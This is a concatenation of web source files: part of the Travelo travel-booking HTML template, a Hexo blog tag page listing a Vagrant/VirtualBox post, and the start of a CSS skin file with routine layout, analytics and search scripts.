<option>Star Clippers</option>
<option>Swan Hellenic Cruises</option>
<option>Thomson Cruises</option>
<option>Viking River Cruises</option>
<option>Windstar Cruises</option>
</select>
</div>
</div>
<div class="col-xs-6">
<label> </label>
<button class="icon-check full-width">SEARCH NOW</button>
</div>
</div>
</div>
</div>
</form>
</div>
<div class="tab-pane fade" id="flight-status-tab">
<form action="flight-list-view.html" method="post">
<div class="row">
<div class="col-md-6">
<h4 class="title">Where</h4>
<div class="form-group row">
<div class="col-xs-6">
<label>Leaving From</label>
<input type="text" class="input-text full-width" placeholder="enter a city or place name" />
</div>
<div class="col-xs-6">
<label>Going To</label>
<input type="text" class="input-text full-width" placeholder="enter a city or place name" />
</div>
</div>
</div>
<div class="col-xs-6 col-md-2">
<h4 class="title">When</h4>
<div class="form-group">
<label>Departure Date</label>
<div class="datepicker-wrap">
<input type="text" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
</div>
<div class="col-xs-6 col-md-2">
<h4 class="title">Who</h4>
<div class="form-group">
<label>Flight Number</label>
<input type="text" class="input-text full-width" placeholder="enter flight number" />
</div>
</div>
<div class="form-group col-md-2 fixheight">
<label class="hidden-xs"> </label>
<button class="icon-check full-width">SEARCH NOW</button>
</div>
</div>
</form>
</div>
<div class="tab-pane fade" id="online-checkin-tab">
<form>
<div class="row">
<div class="col-md-6">
<h4 class="title">Where</h4>
<div class="form-group row">
<div class="col-xs-6">
<label>Leaving From</label>
<input type="text" class="input-text full-width" placeholder="enter a city or place name" />
</div>
<div class="col-xs-6">
<label>Going To</label>
<input type="text" class="input-text full-width" placeholder="enter a city or place name" />
</div>
</div>
</div>
<div class="col-xs-6 col-md-2">
<h4 class="title">When</h4>
<div class="form-group">
<label>Departure Date</label>
<div class="datepicker-wrap">
<input type="text" class="input-text full-width" placeholder="mm/dd/yy" />
</div>
</div>
</div>
<div class="col-xs-6 col-md-2">
<h4 class="title">Who</h4>
<div class="form-group">
<label>Full Name</label>
<input type="text" class="input-text full-width" placeholder="enter your full name" />
</div>
</div>
<div class="form-group col-md-2 fixheight">
<label class="hidden-xs"> </label>
<button class="icon-check full-width">SEARCH NOW</button>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
<div class="section container">
<div class="row image-box style10">
<div class="col-md-4">
<article class="box animated" data-animation-type="fadeInLeft" data-animation-delay="0">
<figure>
<a class="hover-effect" title="" href="car-detailed.html"><img width="370" height="132" alt="" src="http://placehold.it/370x132"></a>
</figure>
<div class="details">
<a href="car-detailed.html" class="button">MORE</a>
<h4 class="box-title">Driven to save?<br><small>Save up to 35%</small></h4>
</div>
</article>
</div>
<div class="col-md-4">
<article class="box animated" data-animation-type="fadeInLeft" data-animation-delay="0.6">
<figure>
<a class="hover-effect" title="" href="car-detailed.html"><img width="370" height="132" alt="" src="http://placehold.it/370x132"></a>
</figure>
<div class="details">
<a href="car-detailed.html" class="button">MORE</a>
<h4 class="box-title">Room to relax<br><small>Earn 250 miles</small></h4>
</div>
</article>
</div>
<div class="col-md-4">
<article class="box animated" data-animation-type="fadeInLeft" data-animation-delay="0.9">
<figure>
<a class="hover-effect" title="" href="car-detailed.html"><img width="370" height="132" alt="" src="http://placehold.it/370x132"></a>
</figure>
<div class="details">
<a href="car-detailed.html" class="button">MORE</a>
<h4 class="box-title">Last Minute Car Deals<br><small>Get best car rental deals</small></h4>
</div>
</article>
</div>
</div>
</div>
<div class="global-map-area section parallax" data-stellar-background-ratio="0.5">
<div class="container">
<h1 class="text-center white-color">Testimonial Style 03</h1>
<div class="testimonial style3">
<ul class="slides ">
<li>
<div class="author"><a href="#"><img src="http://placehold.it/270x270" alt="" width="74" height="74" /></a></div>
<blockquote class="description">We'd like to thank <em>Travelo</em> for making our honeymoon such a memorable experience as we were able to do everything on a single website.</blockquote>
<h2 class="name">Lisa Kimberly</h2>
</li>
<li>
<div class="author"><a href="#"><img src="http://placehold.it/270x270" alt="" width="74" height="74" /></a></div>
<blockquote class="description">We'd like to thank <em>Travelo</em> for making our honeymoon such a memorable experience as we were able to do everything on a single website.</blockquote>
<h2 class="name">Jessica Brown</h2>
</li>
</ul>
</div>
</div>
</div>
<div class="container section">
<h2>Top Car Hire Offers</h2>
<div class="block image-carousel style2 flexslider" data-animation="slide" data-item-width="270" data-item-margin="30">
<ul class="slides image-box style1">
<li>
<article class="box">
<figure>
<a class="hover-effect" title="" href="car-detailed.html"><img width="270" height="160" alt="" src="http://placehold.it/270x160"></a>
</figure>
<div class="details">
<span class="price"><small>FROM</small>$90</span>
<h4 class="box-title">Intermediate<small>Per Day</small></h4>
</div>
</article>
</li>
<li>
<article class="box">
<figure>
<a class="hover-effect" title="" href="car-detailed.html"><img width="270" height="160" alt="" src="http://placehold.it/270x160"></a>
</figure>
<div class="details">
<span class="price"><small>FROM</small>$23</span>
<h4 class="box-title">Economy<small>Per Day</small></h4>
</div>
</article>
</li>
<li>
<article class="box">
<figure>
<a class="hover-effect" title="" href="car-detailed.html"><img width="270" height="160" alt="" src="http://placehold.it/270x160"></a>
</figure>
<div class="details">
<span class="price"><small>FROM</small>$46</span>
<h4 class="box-title">Mini<small>Per Day</small></h4>
</div>
</article>
</li>
<li>
<article class="box">
<figure>
<a class="hover-effect" title="" href="car-detailed.html"><img width="270" height="160" alt="" src="http://placehold.it/270x160"></a>
</figure>
<div class="details">
<span class="price"><small>FROM</small>$55</span>
<h4 class="box-title">Compact<small>Per Day</small></h4>
</div>
</article>
</li>
<li>
<article class="box">
<figure>
<a class="hover-effect" title="" href="car-detailed.html"><img width="270" height="160" alt="" src="http://placehold.it/270x160"></a>
</figure>
<div class="details">
<span class="price"><small>FROM</small>$90</span>
<h4 class="box-title">Intermediate<small>Per Day</small></h4>
</div>
</article>
</li>
</ul>
</div>
<h2>Featured Holiday Activities</h2>
<div class="row image-box style5">
<div class="col-sm-4">
<article class="box">
<figure class="animated" data-animation-type="fadeInDown" data-animation-delay="0">
<a title="" href="#"><img width="370" height="160" alt="" src="http://placehold.it/370x160"></a>
<figcaption>
<h3 class="caption-title">Singapore</h3>
<span>3 activities</span>
</figcaption>
</figure>
<div class="details">
<div class="detail">
<span class="price"><small>FROM</small>$30</span>
<h4 class="box-title"><a href="#">Jurong Bird Park Admission</a></h4>
</div>
<div class="detail">
<span class="price"><small>FROM</small>$120</span>
<h4 class="box-title"><a href="#">Night Safari Adventure</a></h4>
</div>
<div class="detail">
<span class="price"><small>FROM</small>$360</span>
<h4 class="box-title"><a href="#">Jungle Breakfast with Wildlife</a></h4>
</div>
</div>
</article>
</div>
<div class="col-sm-4">
<article class="box">
<figure class="animated" data-animation-type="fadeInDown" data-animation-delay="0.3">
<a title="" href="#"><img width="370" height="160" alt="" src="http://placehold.it/370x160"></a>
<figcaption>
<h3 class="caption-title">Bangkok</h3>
<span>3 activities</span>
</figcaption>
</figure>
<div class="details">
<div class="detail">
<span class="price"><small>FROM</small>$122</span>
<h4 class="box-title"><a href="#">Day Trip to Safari World</a></h4>
</div>
<div class="detail">
<span class="price"><small>FROM</small>$46</span>
<h4 class="box-title"><a href="#">Bangkok Cabaret Show by Night</a></h4>
</div>
<div class="detail">
<span class="price"><small>FROM</small>$259</span>
<h4 class="box-title"><a href="#">Day Trip to Safari World</a></h4>
</div>
</div>
</article>
</div>
<div class="col-sm-4">
<article class="box">
<figure class="animated" data-animation-type="fadeInDown" data-animation-delay="0.6">
<a title="" href="#"><img width="370" height="160" alt="" src="http://placehold.it/370x160"></a>
<figcaption>
<h3 class="caption-title">HongKong</h3>
<span>3 activities</span>
</figcaption>
</figure>
<div class="details">
<div class="detail">
<span class="price"><small>FROM</small>$376</span>
<h4 class="box-title"><a href="#">Half-Day Island Tour</a></h4>
</div>
<div class="detail">
<span class="price"><small>FROM</small>$288</span>
<h4 class="box-title"><a href="#">Ocean Park Tour</a></h4>
</div>
<div class="detail">
<span class="price"><small>FROM</small>$59</span>
<h4 class="box-title"><a href="#">Lantau Island Sightseeing Tour</a></h4>
</div>
</div>
</article>
</div>
</div>
</div>
<div class="global-map-area section parallax" data-stellar-background-ratio="0.5">
<div class="container description">
<div class="text-center">
<h2>Amazing Destination Ideas for <em>you!</em></h2>
</div>
<br>
<div class="row">
<div class="col-xs-6 col-sm-4 col-md-2">
<div class="icon-box style4 animated" data-animation-type="slideInRight" data-animation-delay="0">
<i class="soap-icon-adventure yellow-color"></i>
<h4 class="box-title">Adventure</h4>
<p class="description">
Lorem Ipsum simply dummy text industry.
</p>
</div>
</div>
<div class="col-xs-6 col-sm-4 col-md-2">
<div class="icon-box style4 animated" data-animation-type="slideInRight" data-animation-delay="0.3">
<i class="soap-icon-beach yellow-color"></i>
<h4 class="box-title">Beach</h4>
<p class="description">
Lorem Ipsum simply dummy text industry.
</p>
</div>
</div>
<div class="col-xs-6 col-sm-4 col-md-2">
<div class="icon-box style4 animated" data-animation-type="slideInRight" data-animation-delay="0.6">
<i class="soap-icon-party yellow-color"></i>
<h4 class="box-title">Party</h4>
<p class="description">
Lorem Ipsum simply dummy text industry.
</p>
</div>
</div>
<div class="col-xs-6 col-sm-4 col-md-2">
<div class="icon-box style4 animated" data-animation-type="slideInRight" data-animation-delay="0.9">
<i class="soap-icon-playplace yellow-color"></i>
<h4 class="box-title">Golf</h4>
<p class="description">
Lorem Ipsum simply dummy text industry.
</p>
</div>
</div>
<div class="col-xs-6 col-sm-4 col-md-2">
<div class="icon-box style4 animated" data-animation-type="slideInRight" data-animation-delay="1.2">
<i class="soap-icon-couples yellow-color"></i>
<h4 class="box-title">Romance</h4>
<p class="description">
Lorem Ipsum simply dummy text industry.
</p>
</div>
</div>
<div class="col-xs-6 col-sm-4 col-md-2">
<div class="icon-box style4 animated" data-animation-type="slideInRight" data-animation-delay="1.5">
<i class="soap-icon-ski yellow-color"></i>
<h4 class="box-title">Ski</h4>
<p class="description">
Lorem Ipsum simply dummy text industry.
</p>
</div>
</div>
</div>
</div>
</div>
</section>
<footer id="footer">
<div class="footer-wrapper">
<div class="container">
<div class="row">
<div class="col-sm-6 col-md-3">
<h2>Discover</h2>
<ul class="discover triangle hover row">
<li class="col-xs-6"><a href="#">Safety</a></li>
<li class="col-xs-6"><a href="#">About</a></li>
<li class="col-xs-6"><a href="#">Travelo Picks</a></li>
<li class="col-xs-6"><a href="#">Latest Jobs</a></li>
<li class="active col-xs-6"><a href="#">Mobile</a></li>
<li class="col-xs-6"><a href="#">Press Releases</a></li>
<li class="col-xs-6"><a href="#">Why Host</a></li>
<li class="col-xs-6"><a href="#">Blog Posts</a></li>
<li class="col-xs-6"><a href="#">Social Connect</a></li>
<li class="col-xs-6"><a href="#">Help Topics</a></li>
<li class="col-xs-6"><a href="#">Site Map</a></li>
<li class="col-xs-6"><a href="#">Policies</a></li>
</ul>
</div>
<div class="col-sm-6 col-md-3">
<h2>Travel News</h2>
<ul class="travel-news">
<li>
<div class="thumb">
<a href="#">
<img src="http://placehold.it/63x63" alt="" width="63" height="63" />
</a>
</div>
<div class="description">
<h5 class="s-title"><a href="#">Amazing Places</a></h5>
<p>Purus ac congue arcu cursus ut vitae pulvinar massaidp.</p>
<span class="date">25 Sep, 2013</span>
</div>
</li>
<li>
<div class="thumb">
<a href="#">
<img src="http://placehold.it/63x63" alt="" width="63" height="63" />
</a>
</div>
<div class="description">
<h5 class="s-title"><a href="#">Travel Insurance</a></h5>
<p>Purus ac congue arcu cursus ut vitae pulvinar massaidp.</p>
<span class="date">24 Sep, 2013</span>
</div>
</li>
</ul>
</div>
<div class="col-sm-6 col-md-3">
<h2>Mailing List</h2>
<p>Sign up for our mailing list to get latest updates and offers.</p>
<br />
<div class="icon-check">
<input type="text" class="input-text full-width" placeholder="your email" />
</div>
<br />
<span>We respect your privacy</span>
</div>
<div class="col-sm-6 col-md-3">
<h2>About Travelo</h2>
<p>Nunc cursus libero purus ac congue arcu cursus ut sed vitae pulvinar massaidp nequetiam lore elerisque.</p>
<br />
<address class="contact-details">
<span class="contact-phone"><i class="soap-icon-phone"></i> 1-800-123-HELLO</span>
<br />
<a href="#" class="contact-email">help@travelo.com</a>
</address>
<ul class="social-icons clearfix">
<li class="twitter"><a title="twitter" href="#" data-toggle="tooltip"><i class="soap-icon-twitter"></i></a></li>
<li class="googleplus"><a title="googleplus" href="#" data-toggle="tooltip"><i class="soap-icon-googleplus"></i></a></li>
<li class="facebook"><a title="facebook" href="#" data-toggle="tooltip"><i class="soap-icon-facebook"></i></a></li>
<li class="linkedin"><a title="linkedin" href="#" data-toggle="tooltip"><i class="soap-icon-linkedin"></i></a></li>
<li class="vimeo"><a title="vimeo" href="#" data-toggle="tooltip"><i class="soap-icon-vimeo"></i></a></li>
<li class="dribble"><a title="dribble" href="#" data-toggle="tooltip"><i class="soap-icon-dribble"></i></a></li>
<li class="flickr"><a title="flickr" href="#" data-toggle="tooltip"><i class="soap-icon-flickr"></i></a></li>
</ul>
</div>
</div>
</div>
</div>
<div class="bottom gray-area">
<div class="container">
<div class="logo pull-left">
<a href="index.html" title="Travelo - home">
<img src="images/logo.png" alt="Travelo HTML5 Template" />
</a>
</div>
<div class="pull-right">
<a id="back-to-top" href="#" class="animated" data-animation-type="bounce"><i class="soap-icon-longarrow-up circle"></i></a>
</div>
<div class="copyright pull-right">
<p>© 2014 Travelo</p>
</div>
</div>
</div>
</footer>
</div>
<!-- Javascript -->
<script type="text/javascript" src="js/jquery-1.11.1.min.js"></script>
<script type="text/javascript" src="js/jquery.noconflict.js"></script>
<script type="text/javascript" src="js/modernizr.2.7.1.min.js"></script>
<script type="text/javascript" src="js/jquery-migrate-1.2.1.min.js"></script>
<script type="text/javascript" src="js/jquery.placeholder.js"></script>
<script type="text/javascript" src="js/jquery-ui.1.10.4.min.js"></script>
<!-- Twitter Bootstrap -->
<script type="text/javascript" src="js/bootstrap.js"></script>
<!-- load revolution slider scripts -->
<script type="text/javascript" src="components/revolution_slider/js/jquery.themepunch.plugins.min.js"></script>
<script type="text/javascript" src="components/revolution_slider/js/jquery.themepunch.revolution.min.js"></script>
<!-- Flex Slider -->
<script type="text/javascript" src="components/flexslider/jquery.flexslider-min.js"></script>
<!-- load BXSlider scripts -->
<script type="text/javascript" src="components/jquery.bxslider/jquery.bxslider.min.js"></script>
<!-- parallax -->
<script type="text/javascript" src="js/jquery.stellar.min.js"></script>
<!-- waypoint -->
<script type="text/javascript" src="js/waypoints.min.js"></script>
<!-- load page Javascript -->
<script type="text/javascript" src="js/theme-scripts.js"></script>
<script type="text/javascript" src="js/scripts.js"></script>
<script type="text/javascript">
tjq(document).ready(function() {
tjq('.revolution-slider').revolution(
{
dottedOverlay:"none",
delay:9000,
startwidth:1200,
startheight:646,
touchenabled:"on",
onHoverStop:"on",
hideThumbs:200,
fullWidth:"on",
forceFullWidth:"on",
navigationType:"none",
shadow:0,
spinner:"spinner4",
hideTimerBar:"on",
});
});
</script>
</body>
</html>
|
tags/virtualbox/index.html | seanlook/seanlook.github.com | <!doctype html>
<html class="theme-next mist use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
<link href="//cdn.jsdelivr.net/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet" type="text/css">
<link href="//fonts.lug.ustc.edu.cn/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.6.2/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">
<meta name="keywords" content="Hexo, seanlook, MySQL">
<link rel="alternate" href="/atom.xml" title="Sean's Notes" type="application/atom+xml">
<link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0">
<meta name="description" content="Stay hungry, stay foolish.">
<meta property="og:type" content="website">
<meta property="og:title" content="Sean's Notes">
<meta property="og:url" content="http://seanlook.com/tags/virtualbox/index.html">
<meta property="og:site_name" content="Sean's Notes">
<meta property="og:description" content="Stay hungry, stay foolish.">
<meta property="og:locale" content="en">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Sean's Notes">
<meta name="twitter:description" content="Stay hungry, stay foolish.">
<script type="text/javascript" id="hexo.configurations">
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
scheme: 'Mist',
sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
fancybox: true,
motion: true,
duoshuo: {
userId: '0',
author: 'Author'
},
algolia: {
applicationID: 'WNWHBKUL26',
apiKey: 'cec5cc7d455c77d448433aa60f989766',
indexName: 'seanlook',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
</script>
<link rel="canonical" href="http://seanlook.com/tags/virtualbox/">
<title> Tag: virtualbox | Sean's Notes </title>
</head>
<body itemscope itemtype="http://schema.org/WebPage" lang="en">
<script type="text/javascript">
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?62e026415456b0339db6d3912577a9fa";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
<div style="display: none;">
<script src="//s95.cnzz.com/z_stat.php?id=1253513173&web_id=1253513173" language="JavaScript"></script>
</div>
<div class="container sidebar-position-left ">
<div class="headband"></div>
<header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-wrapper">
<div class="site-meta ">
<div class="custom-logo-site-title">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<span class="site-title">Sean's Notes</span>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<p class="site-subtitle">Stay hungry, stay foolish.</p>
</div>
<div class="site-nav-toggle">
<button>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
</button>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section">
<i class="menu-item-icon fa fa-fw fa-home"></i> <br>
Home
</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives" rel="section">
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
Archives
</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags" rel="section">
<i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
Tags
</a>
</li>
<li class="menu-item menu-item-about">
<a href="/about" rel="section">
<i class="menu-item-icon fa fa-fw fa-user"></i> <br>
About
</a>
</li>
<li class="menu-item menu-item-search">
<a href="javascript:;" class="popup-trigger">
<i class="menu-item-icon fa fa-search fa-fw"></i> <br>
Search
</a>
</li>
</ul>
<div class="site-search">
<div class="popup search-popup local-search-popup">
<div class="local-search-header clearfix">
<span class="search-icon">
<i class="fa fa-search"></i>
</span>
<span class="popup-btn-close">
<i class="fa fa-times-circle"></i>
</span>
<div class="local-search-input-wrapper">
<input autocapitalize="off" autocomplete="off" autocorrect="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
</div>
</div>
<div id="local-search-result"></div>
</div>
</div>
</nav>
</div>
</header>
<main id="main" class="main">
<div class="main-inner">
<div class="content-wrap">
<div id="content" class="content">
<div id="posts" class="posts-collapse">
<div class="collection-title">
<h2>
virtualbox
<small>Tag</small>
</h2>
</div>
<article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
<header class="post-header">
<h1 class="post-title">
<a class="post-title-link" href="/2015/03/25/vagrant/" itemprop="url">
<span itemprop="name">在Mac在Mac/win7下上使用Vagrant打造本地开发环境</span>
</a>
</h1>
<div class="post-meta">
<time class="post-time" itemprop="dateCreated" datetime="2015-03-25T11:21:25+08:00" content="2015-03-25">
03-25
</time>
</div>
</header>
</article>
</div>
</div>
</div>
<div class="sidebar-toggle">
<div class="sidebar-toggle-line-wrap">
<span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
</div>
</div>
<aside id="sidebar" class="sidebar">
<div class="sidebar-inner">
<section class="site-overview sidebar-panel sidebar-panel-active">
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
<img class="site-author-image" itemprop="image" src="/images/avatar_sean.jpg" alt="seanlook">
<p class="site-author-name" itemprop="name">seanlook</p>
<p class="site-description motion-element" itemprop="description">Stay hungry, stay foolish.</p>
</div>
<nav class="site-state motion-element">
<div class="site-state-item site-state-posts">
<a href="/archives">
<span class="site-state-item-count">120</span>
<span class="site-state-item-name">posts</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/index.html">
<span class="site-state-item-count">24</span>
<span class="site-state-item-name">categories</span>
</a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/index.html">
<span class="site-state-item-count">128</span>
<span class="site-state-item-name">tags</span>
</a>
</div>
</nav>
<div class="feed-link motion-element">
<a href="/atom.xml" rel="alternate">
<i class="fa fa-rss"></i>
RSS
</a>
</div>
<div class="links-of-author motion-element">
<span class="links-of-author-item">
<a href="https://github.com/seanlook" target="_blank" title="github">
<i class="fa fa-fw fa-globe"></i>
github
</a>
</span>
<span class="links-of-author-item">
<a href="http://weibo.com/zhouxiaozhxi" target="_blank" title="weibo">
<i class="fa fa-fw fa-globe"></i>
weibo
</a>
</span>
</div>
</section>
</div>
</aside>
</div>
</main>
<footer id="footer" class="footer">
<div class="footer-inner">
<div class="copyright">
© 2014 -
<span itemprop="copyrightYear">2020</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">seanlook</span>
</div>
<div class="powered-by">
Powered by <a class="theme-link" href="https://hexo.io">Hexo</a>
</div>
<div class="theme-info">
Theme -
<a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
NexT.Mist
</a>
</div>
</div>
</footer>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
</div>
</div>
<script type="text/javascript">
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
</script>
<script type="text/javascript" src="//cdn.jsdelivr.net/jquery/2.1.3/jquery.min.js"></script>
<script type="text/javascript" src="//cdn.jsdelivr.net/fastclick/1.0.6/fastclick.min.js"></script>
<script type="text/javascript" src="//cdn.jsdelivr.net/jquery.lazyload/1.9.3/jquery.lazyload.min.js"></script>
<script type="text/javascript" src="//cdn.jsdelivr.net/velocity/1.2.3/velocity.min.js"></script>
<script type="text/javascript" src="//cdn.jsdelivr.net/velocity/1.2.3/velocity.ui.min.js"></script>
<script type="text/javascript" src="//cdn.jsdelivr.net/fancybox/2.1.5/jquery.fancybox.pack.js"></script>
<script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>
<script id="dsq-count-scr" src="https://seanlook.disqus.com/count.js" async></script>
<script type="text/javascript">
// Popup Window;
var isfetched = false;
// Search DB path;
var search_path = "search.xml";
if (search_path.length == 0) {
search_path = "search.xml";
}
var path = "/" + search_path;
// monitor main search box;
function proceedsearch() {
$("body")
.append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
.css('overflow', 'hidden');
$('.popup').toggle();
}
// search function;
var searchFunc = function(path, search_id, content_id) {
'use strict';
$.ajax({
url: path,
dataType: "xml",
async: true,
success: function( xmlResponse ) {
// get the contents from search data
isfetched = true;
$('.popup').detach().appendTo('.header-inner');
var datas = $( "entry", xmlResponse ).map(function() {
return {
title: $( "title", this ).text(),
content: $("content",this).text(),
url: $( "url" , this).text()
};
}).get();
var $input = document.getElementById(search_id);
var $resultContent = document.getElementById(content_id);
$input.addEventListener('input', function(){
var matchcounts = 0;
var str='<ul class=\"search-result-list\">';
var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
$resultContent.innerHTML = "";
if (this.value.trim().length > 1) {
// perform local searching
datas.forEach(function(data) {
var isMatch = false;
var content_index = [];
var data_title = data.title.trim().toLowerCase();
var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
var data_url = decodeURIComponent(data.url);
var index_title = -1;
var index_content = -1;
var first_occur = -1;
// only match artiles with not empty titles and contents
if(data_title != '') {
keywords.forEach(function(keyword, i) {
index_title = data_title.indexOf(keyword);
index_content = data_content.indexOf(keyword);
if( index_title >= 0 || index_content >= 0 ){
isMatch = true;
if (i == 0) {
first_occur = index_content;
}
}
});
}
// show search results
if (isMatch) {
matchcounts += 1;
str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
var content = data.content.trim().replace(/<[^>]+>/g,"");
if (first_occur >= 0) {
// cut out 100 characters
var start = first_occur - 20;
var end = first_occur + 80;
if(start < 0){
start = 0;
}
if(start == 0){
end = 50;
}
if(end > content.length){
end = content.length;
}
var match_content = content.substring(start, end);
// highlight all keywords
keywords.forEach(function(keyword){
var regS = new RegExp(keyword, "gi");
match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
});
str += "<p class=\"search-result\">" + match_content +"...</p>"
}
str += "</li>";
}
})};
str += "</ul>";
if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
$resultContent.innerHTML = str;
});
proceedsearch();
}
});}
// handle and trigger popup window;
$('.popup-trigger').click(function(e) {
e.stopPropagation();
if (isfetched == false) {
searchFunc(path, 'local-search-input', 'local-search-result');
} else {
proceedsearch();
};
});
$('.popup-btn-close').click(function(e){
$('.popup').hide();
$(".local-search-pop-overlay").remove();
$('body').css('overflow', '');
});
$('.popup').click(function(e){
e.stopPropagation();
});
</script>
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
<script>AV.initialize("NliJVBn0857TMk5HYrIRt5wp-gzGzoHsz", "jB9B4QG8Rm8YP04RQqnsKy5M");</script>
<script>
function showTime(Counter) {
var query = new AV.Query(Counter);
var entries = [];
var $visitors = $(".leancloud_visitors");
$visitors.each(function () {
entries.push( $(this).attr("id").trim() );
});
query.containedIn('url', entries);
query.find()
.done(function (results) {
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
if (results.length === 0) {
$visitors.find(COUNT_CONTAINER_REF).text(0);
return;
}
for (var i = 0; i < results.length; i++) {
var item = results[i];
var url = item.get('url');
var time = item.get('time');
var element = document.getElementById(url);
$(element).find(COUNT_CONTAINER_REF).text(time);
}
for(var i = 0; i < entries.length; i++) {
var url = entries[i];
var element = document.getElementById(url);
var countSpan = $(element).find(COUNT_CONTAINER_REF);
if( countSpan.text() == '') {
countSpan.text(0);
}
}
})
.fail(function (object, error) {
console.log("Error: " + error.code + " " + error.message);
});
}
function addCount(Counter) {
var $visitors = $(".leancloud_visitors");
var url = $visitors.attr('id').trim();
var title = $visitors.attr('data-flag-title').trim();
var query = new AV.Query(Counter);
query.equalTo("url", url);
query.find({
success: function(results) {
if (results.length > 0) {
var counter = results[0];
counter.fetchWhenSave(true);
counter.increment("time");
counter.save(null, {
success: function(counter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(counter.get('time'));
},
error: function(counter, error) {
console.log('Failed to save Visitor num, with error message: ' + error.message);
}
});
} else {
var newcounter = new Counter();
/* Set ACL */
var acl = new AV.ACL();
acl.setPublicReadAccess(true);
acl.setPublicWriteAccess(true);
newcounter.setACL(acl);
/* End Set ACL */
newcounter.set("title", title);
newcounter.set("url", url);
newcounter.set("time", 1);
newcounter.save(null, {
success: function(newcounter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
},
error: function(newcounter, error) {
console.log('Failed to create');
}
});
}
},
error: function(error) {
console.log('Error:' + error.code + " " + error.message);
}
});
}
$(function() {
var Counter = AV.Object.extend("Counter");
if ($('.leancloud_visitors').length == 1) {
addCount(Counter);
} else if ($('.post-title-link').length > 1) {
showTime(Counter);
}
});
</script>
</body>
</html>
|
static/style/skin/metro/leaf_app_editor.css | LZUOSS/ISCloud | .topback_this { background: #04d1d0;}
::-webkit-scrollbar-track-piece { background-color: rgba(255,255,255,0.2);}
::-webkit-scrollbar { width: 10px; height: 10px;}
::-webkit-scrollbar-thumb { background-color: rgba(0,0,0,0.2); border-radius: 12px; background-clip: padding-box; border: 1px solid rgba(0,0,0,0.3); min-height: 28px;}
::-webkit-scrollbar-thumb:hover { border: 1px solid rgba(0,0,0,0.6); background-color: rgba(0,0,0,0.45);}
.hidden { display: none;}
.frame_fullscreen { position: fixed; z-index: 999499; left: 0; top: 0;}
.font-icon { text-shadow: 0 0 0px;}
.dragMaskView { position: absolute; top: 0; left: 0; right: 0; bottom: 0; z-index: 888; background: #fff; opacity: 0.01; filter: alpha(opacity=1); -khtml-user-select: none; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;}
input,button,select,textarea { line-height: initial;}
a { text-decoration: none;}
body { font-size: 13px; padding: 0px; margin: 0px; font-family: 'Helvetica Neue', "Microsoft Yahei", "微软雅黑", "STXihei", "WenQuanYi Micro Hei", sans-serif; -khtml-user-select: none; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none;}
